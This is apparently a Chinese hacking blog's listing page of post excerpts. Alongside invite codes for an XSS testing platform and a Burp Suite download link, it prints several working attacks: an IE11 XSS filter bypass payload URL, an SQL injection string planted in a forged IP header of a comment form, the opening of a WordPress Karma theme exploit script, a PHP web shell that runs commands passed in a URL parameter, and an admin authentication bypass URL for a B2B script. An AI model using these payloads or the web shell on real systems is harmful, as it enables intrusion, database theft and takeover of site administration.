• Xss测试平台邀请码[12月4日更新]

    Xss测试平台邀请码[12月4日更新]
    Links:http://xss.re/ 2015年11月30日 23:20 重新开启 邀请码: d0bee52a6dd0f7a770d109cffa31a49d a49fd8767a827b5d9c6075d0cc6e3e91 eb00f5a5c36d03055c7807c7c716fb24 5d85d80499b324c6596b501265a43ea6 e31b55764ce905cd3aa17734b1898509 16943fffcecd1759e3314df762aa215a accde626f685af525164571219d197dc c87c11639bd4170b9863392f4787682d ff169ce65b6006269b817a...
    作者:unhonker| 发布:2013年1月08日 | 分类:个人关注 | 被撸:73,694次| 标签:
  • burpsuite V1.7.11较新的文章

    burpsuite V1.7.11
    之前的版本貌似都集体失效了,这个版本是目前可以用的,刚测试了下。 下载地址: Burp v1.7
    作者:unhonker| 发布:2016年12月05日 | 分类:个人关注 | 被撸:19次| 标签:
  • IE11 XSS 过滤器绕过漏洞

    IE11 XSS 过滤器绕过漏洞
    EXP: http://unhonker.com/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n
    作者:unhonker| 发布:2016年6月14日 | 分类:漏洞公布 | 被撸:1,101次| 标签:
  • 青客云sql注入漏洞第二发

    青客云sql注入漏洞第二发
    本文出自红客联盟 太极实验室(ihonker.org) 这次不是延时注入,问题是出现在评论时获取ip处, 在发表评论的时候,发现,ip可以伪造,并且被带入到feedback数据库里面,一枚完美的注入产生了,在发表评论的时候,ip伪造下 8.8.8.8\",'IANA',user(),'','1463286558','0','','0')# 内容随便写,爆出了user() 其中1463286558表示的是时间 其中获取ip的函数 function g...
    作者:unhonker| 发布:2016年6月07日 | 分类:漏洞公布 | 被撸:1,058次| 标签:
  • WordPress Karma 4.7 – Responsive Theme Exploit

    WordPress Karma 4.7 – Responsive Theme Exploit
    <?php /**  * Exploit Title: Karma Theme Exploit  * Version: 4.7  * Tested on: Debian 8, PHP 5.6.17-3  * Type: Authenticated Options overwrite, Stored XSS  * Time line: Found [28-Apr-2016], Vendor notified [28-Apr-2016], Vendor fixed: [], [RD:1]  */     require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/s...
    作者:unhonker| 发布:2016年6月07日 | 分类:漏洞公布 | 被撸:995次| 标签:
  • 绕过PHP5.2.X的安全模式

    绕过PHP5.2.X的安全模式
    php版本小于等于5.2.* <?php         //Exploit Code         system('\dir');         system('\net user');         print passthru ('\ipconfig');         exec('\whoami',$a);         print_r($a);         //Shell Script         //shell.php?cmd=net user         $cmd = '\\'.$_GET['cmd'];         system($cmd); ?>
    作者:unhonker| 发布:2016年5月13日 | 分类:漏洞公布 | 被撸:1,296次| 标签:
  • Alibaba Clone B2B Script管理身份绕过漏洞

    Alibaba Clone B2B Script管理身份绕过漏洞
    # Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass # Vendor Homepage: [url]http://alibaba-clone.com/[/url] # Version: All Versions     Exploit : For enter , simply enter the following code http://server/admin/adminhome.php?tmp=1     For each page is enough to add the following code to the end of url example see page...
    作者:unhonker| 发布:2016年5月05日 | 分类:漏洞公布 | 被撸:1,751次|